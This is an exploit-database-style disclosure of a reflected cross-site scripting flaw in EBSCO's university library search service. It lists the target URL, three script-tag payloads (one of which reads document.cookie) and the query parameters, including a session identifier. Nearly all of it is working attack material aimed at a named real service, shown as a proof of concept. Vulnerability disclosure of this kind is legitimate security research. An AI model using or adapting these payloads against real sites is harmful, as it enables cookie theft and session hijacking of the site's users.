# Exploit Title: [Reflected XSS at EBSCO University Library System]
# Date: [01.04.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [https://www.ebsco.com/]
# Software Link: [ EBSCO University Library System ]
# Version: Last Version
# Risk : Medium
# POC:
Url address : http://eds.b.ebscohost.com/eds/results?vid=1
Reflected XSS Payload :
<script>alert('Ismail Tasdelen')</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
Query String Parametres :
vid: 1
sid: 7074b067-d86d-4482-8e47-05f7cce84f6d@pdc-v-sessmgr01
bquery: XX "ismail"[100] AND (XX "script"[92] OR XX "alert"[87])
bdata: JmNsaTA9RlQxJmNsdjA9WSZsYW5nPXRyJnR5cGU9MCZzaXRlPWVkcy1saXZl
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen